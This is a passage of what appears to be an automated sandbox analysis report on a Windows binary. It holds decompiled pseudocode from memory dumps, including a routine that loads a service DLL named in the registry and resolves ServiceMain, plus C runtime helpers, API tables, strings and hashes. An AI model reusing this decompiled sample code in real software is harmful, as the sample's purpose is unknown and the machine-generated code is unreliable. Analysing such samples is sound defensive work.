							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x00a3c610
0x00a3c610
0x00a3c610
0x00a3c616
0x00a3c69d
0x00a3c69f
0x00a3c6a1
0x00a3ca20
0x00a3ca20
0x00a3d811
0x00a3d811
0x00a3c6a7
0x00a3c6ad
0x00a3c734
0x00a3c736
0x00a3c738
0x00000000
0x00000000
0x00a3c73e
0x00a3c744
0x00a3c7cb
0x00a3c7cd
0x00a3c7cf
0x00000000
0x00000000
0x00a3c7d5
0x00a3c7db
0x00a3c862
0x00a3c864
0x00a3c866
0x00000000
0x00000000
0x00a3c872
0x00a3c8fa
0x00a3c8fc
0x00a3c8fe
0x00000000
0x00000000
0x00a3c904
0x00a3c90a
0x00a3c991
0x00a3c993
0x00a3c995
0x00000000
0x00000000
0x00a3c99b
0x00a3c9a1
0x00a3ca18
0x00a3ca1a
0x00a3ca1c
0x00a3ca1e
0x00a3ca1e
0x00000000
0x00a3ca1c
0x00a3c9aa
0x00a3c9ac
0x00a3c9c0
0x00a3c9c8
0x00a3c9ca
0x00a3c9de
0x00a3c9e6
0x00a3c9e8
0x00a3c9fc
0x00a3ca04
0x00a3ca06
0x00a3ca0f
0x00a3ca0f
0x00000000
0x00a3ca06
0x00a3c9f1
0x00a3c9fa
0x00000000
0x00000000
0x00000000
0x00a3c9fa
0x00a3c9d3
0x00a3c9dc
0x00000000
0x00000000
0x00000000
0x00a3c9dc
0x00a3c9b5
0x00a3c9be
0x00000000
0x00000000
0x00000000
0x00a3c9be
0x00a3c917
0x00a3c919
0x00a3c931
0x00a3c939
0x00a3c93b
0x00a3c953
0x00a3c95b
0x00a3c95d
0x00a3c975
0x00a3c97d
0x00a3c97f
0x00a3c988
0x00a3c988
0x00000000
0x00a3c97f
0x00a3c966
0x00a3c96f
0x00000000
0x00000000
0x00000000
0x00a3c96f
0x00a3c944
0x00a3c94d
0x00000000
0x00000000
0x00000000
0x00a3c94d
0x00a3c922
0x00a3c92b
0x00000000
0x00000000
0x00000000
0x00a3c92b
0x00a3c880
0x00a3c882
0x00a3c89a
0x00a3c8a2
0x00a3c8a4
0x00a3c8bc
0x00a3c8c4
0x00a3c8c6
0x00a3c8de
0x00a3c8e6
0x00a3c8e8
0x00a3c8f1
0x00a3c8f1
0x00000000
0x00a3c8e8
0x00a3c8cf
0x00a3c8d8
0x00000000
0x00000000
0x00000000
0x00a3c8d8
0x00a3c8ad
0x00a3c8b6
0x00000000
0x00000000
0x00000000
0x00a3c8b6
0x00a3c88b
0x00a3c894
0x00000000
0x00000000
0x00000000
0x00a3c894
0x00a3c7e8
0x00a3c7ea
0x00a3c802
0x00a3c80a
0x00a3c80c
0x00a3c824
0x00a3c82c
0x00a3c82e
0x00a3c846
0x00a3c84e
0x00a3c850
0x00a3c859
0x00a3c859
0x00000000
0x00a3c850
0x00a3c837
0x00a3c840
0x00000000
0x00000000
0x00000000
0x00a3c840
0x00a3c815
0x00a3c81e
0x00000000
0x00000000
0x00000000
0x00a3c81e
0x00a3c7f3
0x00a3c7fc
0x00000000
0x00000000
0x00000000
0x00a3c7fc
0x00a3c751
0x00a3c753
0x00a3c76b
0x00a3c773
0x00a3c775
0x00a3c78d
0x00a3c795
0x00a3c797
0x00a3c7af
0x00a3c7b7
0x00a3c7b9
0x00a3c7c2
0x00a3c7c2
0x00000000
0x00a3c7b9
0x00a3c7a0
0x00a3c7a9
0x00000000
0x00000000
0x00000000
0x00a3c7a9
0x00a3c77e
0x00a3c787
0x00000000
0x00000000
0x00000000
0x00a3c787
0x00a3c75c
0x00a3c765
0x00000000
0x00000000
0x00000000
0x00a3c765
0x00a3c6ba
0x00a3c6bc
0x00a3c6d4
0x00a3c6dc
0x00a3c6de
0x00a3c6f6
0x00a3c6fe
0x00a3c700
0x00a3c718
0x00a3c720
0x00a3c722
0x00a3c72b
0x00a3c72b
0x00000000
0x00a3c722
0x00a3c709
0x00a3c712
0x00000000
0x00000000
0x00000000
0x00a3c712
0x00a3c6e7
0x00a3c6f0
0x00000000
0x00000000
0x00000000
0x00a3c6f0
0x00a3c6c5
0x00a3c6ce
0x00000000
0x00000000
0x00000000
0x00a3c6ce
0x00a3c623
0x00a3c625
0x00a3c63d
0x00a3c645
0x00a3c647
0x00a3c65f
0x00a3c667
0x00a3c669
0x00a3c681
0x00a3c689
0x00a3c68b
0x00a3c694
0x00a3c694
0x00000000
0x00a3c68b
0x00a3c672
0x00a3c67b
0x00000000
0x00000000
0x00000000
0x00a3c67b
0x00a3c650
0x00a3c659
0x00000000
0x00000000
0x00000000
0x00a3c659
0x00a3c62e
0x00a3c637
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 6e2982e123535fbc2bbb7617d163a1287d04137f9e7bf34d2803aec703b0943d
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 43C170322151A309DF6D8739983413FBBA15AA27B171A176DF4B3EB1D4FE20C5249720

Uniqueness

Uniqueness Score: -1.00%

Function 00A31160, Relevance: 79.0, APIs: 35, Strings: 10, Instructions: 225
memorystringregistryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A31160(WCHAR* _a4, WCHAR** _a8) {
				void* _v8;
				void* _v12;
				long _v16;
				struct HINSTANCE__* _v20;
				void* _v24;
				signed int _v28;
				WCHAR* _v32;
				_Unknown_base(*)()* _v36;
				void* _v40;
				int _v44;
				long _v48;
				int _t82;
				int _t83;
				int _t85;
				int _t86;
				long _t125;
				void* _t134;

				_v12 = 0;
				_v8 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v36 = 0;
				_v48 = 0;
				_t82 = lstrlenW(L"System\\CurrentControlSet\\Services");
				_t83 = lstrlenW("\\");
				_t85 = lstrlenW(_a4);
				_t86 = lstrlenW("\\");
				_t11 = lstrlenW(L"Parameters") + 1; // 0x1
				_v28 = _t82 + _t83 + _t85 + _t86 + _t11;
				_v8 = HeapAlloc(GetProcessHeap(), 0, _v28 << 1);
				lstrcpyW(_v8, L"System\\CurrentControlSet\\Services");
				lstrcatW(_v8, "\\");
				lstrcatW(_v8, _a4);
				lstrcatW(_v8, "\\");
				lstrcatW(_v8, L"Parameters");
				 *((short*)(_v8 + _v28 * 2 - 2)) = 0;
				_v16 = RegOpenKeyExW(0x80000002, _v8, 0, 0x20019,  &_v12);
				if(_v16 == 0) {
					_v40 = E00A31000(_v12, L"ServiceDll");
					if(_v40 != 0) {
						_v32 = E00A310B0(_v40);
						if(_v32 != 0) {
							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, 0,  &_v44);
							if(_v16 != 0) {
								L10:
								RegCloseKey(_v12);
								_v20 = LoadLibraryExW(_v32, 0, 8);
								if(_v20 != 0) {
									if(_v24 == 0) {
										_v36 = GetProcAddress(_v20, "ServiceMain");
									} else {
										_v36 = GetProcAddress(_v20, _v24);
									}
									if(_v36 != 0) {
										GetProcAddress(_v20, "SvchostPushServiceGlobals");
										 *_a8 = _a4;
										_a8[1] = _v36;
										_v48 = 1;
									} else {
										FreeLibrary(_v20);
									}
								} else {
									_t125 = GetLastError();
									0xa30000(_v32, _t125);
									0xa30000("failed to load library %s, err=%u\n", _t125);
								}
								goto L18;
							}
							_v28 = _v44 + 1;
							_v24 = HeapAlloc(GetProcessHeap(), 0, _v28);
							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, _v24,  &_v44);
							if(_v16 == 0) {
								 *((char*)(_v24 + _v28 - 1)) = 0;
								goto L10;
							}
							RegCloseKey(_v12);
							goto L18;
						}
						RegCloseKey(_v12);
						goto L18;
					}
					RegCloseKey(_v12);
					goto L18;
				} else {
					_t134 = _v8;
					0xa30000(_t134, _v16);
					0xa30000("cannot open key %s, err=%d\n", _t134);
					L18:
					HeapFree(GetProcessHeap(), 0, _v8);
					HeapFree(GetProcessHeap(), 0, _v40);
					HeapFree(GetProcessHeap(), 0, _v32);
					HeapFree(GetProcessHeap(), 0, _v24);
					return _v48;
				}
			}

0x00a31167
0x00a3116e
0x00a31175
0x00a3117c
0x00a31183
0x00a3118a
0x00a31191
0x00a31198
0x00a311a4
0x00a311b1
0x00a311bd
0x00a311ca
0x00a311dd
0x00a311e1
0x00a311f9
0x00a31205
0x00a31214
0x00a31222
0x00a31231
0x00a31240
0x00a3124e
0x00a3126d
0x00a31274
0x00a312a1
0x00a312a8
0x00a312c2
0x00a312c9
0x00a312f3
0x00a312fa
0x00a31358
0x00a3135c
0x00a31370
0x00a31377
0x00a3139a
0x00a313be
0x00a3139c
0x00a313aa
0x00a313aa
0x00a313c5
0x00a313dc
0x00a313e8
0x00a313f0
0x00a313f3
0x00a313c7
0x00a313cb
0x00a313cb
0x00a31379
0x00a31379
0x00a31384
0x00a3138f
0x00a3138f
0x00000000
0x00a31377
0x00a31302
0x00a31318
0x00a31336
0x00a3133d
0x00a31354
0x00000000
0x00a31354
0x00a31343
0x00000000
0x00a31343
0x00a312cf
0x00000000
0x00a312cf
0x00a312ae
0x00000000
0x00a31276
0x00a3127a
0x00a3127e
0x00a31289
0x00a313fa
0x00a31407
0x00a3141a
0x00a3142d
0x00a31440
0x00a3144d
0x00a3144d

APIs

lstrlenW.KERNEL32(System\CurrentControlSet\Services), ref: 00A311A4
lstrlenW.KERNEL32(00A50048), ref: 00A311B1
lstrlenW.KERNEL32(00000000), ref: 00A311BD
lstrlenW.KERNEL32(00A5004C), ref: 00A311CA
lstrlenW.KERNEL32(Parameters), ref: 00A311D7
GetProcessHeap.KERNEL32(00000000,?), ref: 00A311EC
HeapAlloc.KERNEL32(00000000), ref: 00A311F3
lstrcpyW.KERNEL32 ref: 00A31205
lstrcatW.KERNEL32(00000000,00A50068), ref: 00A31214
lstrcatW.KERNEL32(00000000,00000000), ref: 00A31222
lstrcatW.KERNEL32(00000000,00A5006C), ref: 00A31231
lstrcatW.KERNEL32(00000000,Parameters), ref: 00A31240
RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 00A31267
RegCloseKey.ADVAPI32(00000000), ref: 00A312AE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A31400
HeapFree.KERNEL32(00000000), ref: 00A31407
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A31413
HeapFree.KERNEL32(00000000), ref: 00A3141A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A31426
HeapFree.KERNEL32(00000000), ref: 00A3142D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A31439
HeapFree.KERNEL32(00000000), ref: 00A31440

Strings

SvchostPushServiceGlobals, xrefs: 00A313D3
failed to load library %s, err=%u, xrefs: 00A3138A
ServiceMain, xrefs: 00A313AF
ServiceDll, xrefs: 00A31293
Parameters, xrefs: 00A311D2
cannot open key %s, err=%d, xrefs: 00A31284
ServiceMain, xrefs: 00A312E4
System\CurrentControlSet\Services, xrefs: 00A3119F, 00A311FC
Parameters, xrefs: 00A31237
ServiceMain, xrefs: 00A31327

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Processlstrlen$Freelstrcat$AllocCloseOpenlstrcpy
String ID: Parameters$Parameters$ServiceDll$ServiceMain$ServiceMain$ServiceMain$SvchostPushServiceGlobals$System\CurrentControlSet\Services$cannot open key %s, err=%d$failed to load library %s, err=%u
API String ID: 922840199-2032176762
Opcode ID: 7befe4a55d39a50d17e417865d6ff37bd6bb8527f4b1df27325faf74f2dcab86
Instruction ID: 202224b556a27efffd4417aa8847c4478f718cb79c0e98f6bb1e027d9fb2d6e3
Opcode Fuzzy Hash: 7befe4a55d39a50d17e417865d6ff37bd6bb8527f4b1df27325faf74f2dcab86
Instruction Fuzzy Hash: 1691D779A00208EFDB14DBE4D949FEFBBB8FB89705F108508FA06A7290C7755955CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A51E, Relevance: 19.6, APIs: 13, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A3A51E(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00A34B0B(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E00A34B0B(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00A34B0B(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E00A3A033( *_t42, 0xa50488);
								_t15 = E00A3A91E(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00A34AD3();
									E00A34E58( *_t42);
									E00A34CFE( *_t42);
									E00A34AD3(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00A35592(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00A34AD3( *_t42);
							E00A34AD3(_t42);
							L8:
							goto L3;
						}
						E00A34AD3(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00A359B3(_t48))) = 0xc;
					goto L4;
				}
			}

0x00a3a527
0x00a3a54d
0x00000000
0x00a3a52f
0x00a3a53a
0x00a3a53e
0x00a3a540
0x00a3a559
0x00a3a55e
0x00a3a562
0x00a3a564
0x00a3a575
0x00a3a57a
0x00a3a57f
0x00a3a581
0x00a3a59a
0x00a3a5a7
0x00a3a5af
0x00a3a5b2
0x00a3a5b4
0x00a3a5c9
0x00a3a5c9
0x00a3a5d0
0x00a3a5d7
0x00a3a5dd
0x00a3a5e5
0x00a3a5ee
0x00000000
0x00a3a5ee
0x00a3a5b8
0x00a3a5bb
0x00a3a5c2
0x00a3a5c4
0x00a3a5ec
0x00000000
0x00a3a5ec
0x00a3a5c6
0x00000000
0x00a3a5c6
0x00a3a585
0x00a3a58b
0x00a3a56c
0x00000000
0x00a3a56c
0x00a3a567
0x00000000
0x00a3a567
0x00a3a542
0x00a3a547
0x00000000
0x00a3a547

APIs

__calloc_crt.LIBCMT ref: 00A3A535

Part of subcall function 00A34B0B: __calloc_impl.LIBCMT ref: 00A34B1A

__calloc_crt.LIBCMT ref: 00A3A559
_free.LIBCMT ref: 00A3A567
__calloc_crt.LIBCMT ref: 00A3A575
_free.LIBCMT ref: 00A3A585
_free.LIBCMT ref: 00A3A58B
__copytlocinfo_nolock.LIBCMT ref: 00A3A59A
__wsetlocale_nolock.LIBCMT ref: 00A3A5A7
__setmbcp_nolock.LIBCMT ref: 00A3A5BB
_free.LIBCMT ref: 00A3A5C9
___removelocaleref.LIBCMT ref: 00A3A5D0
___freetlocinfo.LIBCMT ref: 00A3A5D7
_free.LIBCMT ref: 00A3A5DD

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 0f4690aef0125747b03b70cdbe1d8f6c273f44f594c25372c69df2e26eb8881e
Instruction ID: 8b1d823f93bf1d34ec0ff0370b1f76696e8f3b267573592a7899a3a958caa235
Opcode Fuzzy Hash: 0f4690aef0125747b03b70cdbe1d8f6c273f44f594c25372c69df2e26eb8881e
Instruction Fuzzy Hash: A1210532544B21EAEB217F64DE02E5BBBE5DF65760F208429F4C5950A1EB319910CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A331C0, Relevance: 18.1, APIs: 12, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A331C0(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;
				intOrPtr _t39;

				_t14 = __ebx;
				__imp__DecodePointer( *0xa531b4);
				_t25 =  *0xa5127c; // 0xace8b8
				_t24 = __eax;
				if(_t25 == 0) {
					L4:
					_push(_t14);
					E00A34AD3(_t25);
					_t26 =  *0xa51278; // 0x0
					 *0xa5127c = 0;
					if(_t26 == 0) {
						L8:
						E00A34AD3(_t26);
						 *0xa51278 = 0;
						E00A34AD3( *0xa51274);
						_t5 = E00A34AD3( *0xa51270);
						_t27 = _t26 | 0xffffffff;
						 *0xa51274 = 0;
						 *0xa51270 = 0;
						if(_t24 != _t27) {
							_t39 =  *0xa531b4; // 0x97a6df02
							if(_t39 != 0) {
								_t5 = E00A34AD3(_t24);
							}
						}
						__imp__EncodePointer(_t27);
						 *0xa531b4 = _t5;
						_t6 =  *0xa51d7c; // 0x0
						if(_t6 != 0) {
							E00A34AD3(_t6);
							 *0xa51d7c = 0;
						}
						_t7 =  *0xa51d80; // 0x0
						if(_t7 != 0) {
							E00A34AD3(_t7);
							 *0xa51d80 = 0;
						}
						_t8 =  *0xa50974; // 0xad3f88
						asm("lock xadd [eax], esi");
						if(_t27 != 1) {
							L18:
							return _t8;
						} else {
							_t8 =  *0xa50974; // 0xad3f88
							if(_t8 == 0xa50750) {
								goto L18;
							}
							_t9 = E00A34AD3(_t8);
							 *0xa50974 = 0xa50750;
							return _t9;
						}
					}
					while( *_t26 != 0) {
						E00A34AD3( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0xa51278; // 0x0
					goto L8;
				}
				while( *_t25 != 0) {
					E00A34AD3( *_t25);
					_t25 = _t25 + 4;
					if(_t25 != 0) {
						continue;
					}
					break;
				}
				_t25 =  *0xa5127c; // 0xace8b8
				goto L4;
			}

0x00a331c0
0x00a331c8
0x00a331ce
0x00a331d4
0x00a331d8
0x00a331f2
0x00a331f2
0x00a331f4
0x00a331f9
0x00a33201
0x00a3320a
0x00a33223
0x00a33224
0x00a3322f
0x00a33235
0x00a33240
0x00a33245
0x00a33248
0x00a33251
0x00a33259
0x00a3325b
0x00a33261
0x00a33264
0x00a33269
0x00a33261
0x00a3326b
0x00a33271
0x00a33276
0x00a3327d
0x00a33280
0x00a33286
0x00a33286
0x00a3328c
0x00a33293
0x00a33296
0x00a3329c
0x00a3329c
0x00a332a2
0x00a332a7
0x00a332ad
0x00a332cc
0x00a332cc
0x00a332af
0x00a332af
0x00a332bb
0x00000000
0x00000000
0x00a332be
0x00a332c4
0x00000000
0x00a332c4
0x00a332ad
0x00a3320c
0x00a33212
0x00a33218
0x00a3321b
0x00000000
0x00000000
0x00000000
0x00a3321b
0x00a3321d
0x00000000
0x00a3321d
0x00a331da
0x00a331e1
0x00a331e7
0x00a331ea
0x00000000
0x00000000
0x00000000
0x00a331ea
0x00a331ec
0x00000000

APIs

DecodePointer.KERNEL32 ref: 00A331C8
_free.LIBCMT ref: 00A331E1

Part of subcall function 00A34AD3: HeapFree.KERNEL32(00000000,00000000,?,00A32EBA,00000000,00000003), ref: 00A34AE7
Part of subcall function 00A34AD3: GetLastError.KERNEL32(00000000,?,00A32EBA,00000000,00000003), ref: 00A34AF9

_free.LIBCMT ref: 00A331F4
_free.LIBCMT ref: 00A33212
_free.LIBCMT ref: 00A33224
_free.LIBCMT ref: 00A33235
_free.LIBCMT ref: 00A33240
_free.LIBCMT ref: 00A33264
EncodePointer.KERNEL32(00000000), ref: 00A3326B
_free.LIBCMT ref: 00A33280
_free.LIBCMT ref: 00A33296
_free.LIBCMT ref: 00A332BE

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: 2db062e0ed83e10a304b125e91af414e8fc39a0a041104893e29aea75e1f8785
Instruction ID: a6fed6f08bf0f8caf1d817fcd1a4cfb4a5064b73dd4bfa25292a92711992b6fb
Opcode Fuzzy Hash: 2db062e0ed83e10a304b125e91af414e8fc39a0a041104893e29aea75e1f8785
Instruction Fuzzy Hash: F5218DB7D057118BDF10DFF4ED406ABB7A0FB5A362B05022AF80497225CB316E128B84

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A5F5, Relevance: 15.1, APIs: 10, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00A3A5F5(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E00A36A7B(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00A3592F(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0xa4e2d0);
					E00A34010(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E00A32E42();
						_v36 = _t88;
						E00A34EF8(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E00A34B0B(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00A34934(0xc);
							_v8 = 1;
							E00A3A033(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E00A3A76A();
							_t66 = E00A3A91E(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E00A34E58(_t83);
								_t43 = E00A34CFE(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00A3F030(_a8, 0xa5031c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0xa520d4 = 1;
									}
								}
								E00A34934(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E00A34F78(_t25, _t83);
								E00A34E58(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0xa50e94 & 0x00000001;
									if(( *0xa50e94 & 0x00000001) == 0) {
										E00A34F78(0xa50484,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0xa50484; // 0xa50488
										_t32 = _t77 + 0x84; // 0xa50ea0
										 *0xa50e98 =  *_t32;
										_t33 = _t77 + 0x90; // 0xa4a660
										 *0xa50ef4 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0xa50318 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00A3A779();
							}
						}
						_v8 = 0xfffffffe;
						E00A3A7AC(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00A359B3(__eflags))) = 0x16;
						E00A35904();
						_t45 = 0;
					}
					return E00A34055(_t45);
				}
				L20:
			}

0x00a3a5f5
0x00a3a5f8
0x00a3a5fb
0x00a3a5fc
0x00a3a601
0x00a3a625
0x00a3a628
0x00a3a603
0x00a3a603
0x00a3a604
0x00a3a607
0x00a3a607
0x00a3a612
0x00a3a617
0x00a3a61c
0x00000000
0x00000000
0x00a3a61e
0x00a3a622
0x00000000
0x00a3a624
0x00000000
0x00a3a624
0x00000000
0x00a3a622
0x00a3a629
0x00a3a62a
0x00a3a62b
0x00a3a62c
0x00a3a62d
0x00a3a62e
0x00a3a633
0x00a3a634
0x00a3a636
0x00a3a63b
0x00a3a640
0x00a3a642
0x00a3a645
0x00a3a649
0x00a3a667
0x00a3a669
0x00a3a66c
0x00a3a671
0x00a3a675
0x00a3a686
0x00a3a688
0x00a3a68b
0x00a3a68d
0x00a3a695
0x00a3a69b
0x00a3a6a6
0x00a3a6ad
0x00a3a6b1
0x00a3a6c5
0x00a3a6c7
0x00a3a6ca
0x00a3a6cc
0x00a3a785
0x00a3a78b
0x00a3a6d2
0x00a3a6d2
0x00a3a6d6
0x00a3a6e0
0x00a3a6e7
0x00a3a6e9
0x00a3a6eb
0x00a3a6eb
0x00a3a6e9
0x00a3a6f7
0x00a3a6fd
0x00a3a704
0x00a3a709
0x00a3a70f
0x00a3a717
0x00a3a71b
0x00a3a71d
0x00a3a724
0x00a3a72e
0x00a3a735
0x00a3a73b
0x00a3a741
0x00a3a746
0x00a3a74c
0x00a3a751
0x00a3a754
0x00a3a754
0x00a3a724
0x00a3a759
0x00a3a75d
0x00a3a75d
0x00a3a6cc
0x00a3a792
0x00a3a799
0x00a3a79e
0x00a3a64b
0x00a3a650
0x00a3a656
0x00a3a65b
0x00a3a65b
0x00a3a7a5
0x00a3a7a5
0x00000000

APIs

__calloc_crt.LIBCMT ref: 00A3A67F
__lock.LIBCMT ref: 00A3A695
__copytlocinfo_nolock.LIBCMT ref: 00A3A6A6
__wsetlocale_nolock.LIBCMT ref: 00A3A6BD
__lock.LIBCMT ref: 00A3A6F7
__updatetlocinfoEx_nolock.LIBCMT ref: 00A3A709
___removelocaleref.LIBCMT ref: 00A3A70F
__updatetlocinfoEx_nolock.LIBCMT ref: 00A3A72E

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
String ID:
API String ID: 790675137-0
Opcode ID: 28585c478c05012a372d98837125bfc0edb3bb18896f75b439a3f81c2285b269
Instruction ID: 9562a9a480dfa9f91002a1f444ddddf865f55f93c161ef3db07fab7bb841eef8
Opcode Fuzzy Hash: 28585c478c05012a372d98837125bfc0edb3bb18896f75b439a3f81c2285b269
Instruction Fuzzy Hash: 5641F372904314EFDB00AFA4DA83B9D7BF4BF18324F20842DF95896192DBB59941CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A3300F, Relevance: 15.1, APIs: 10, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00A3300F(void* __edx, char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				intOrPtr* _t7;
				intOrPtr _t9;
				short* _t10;
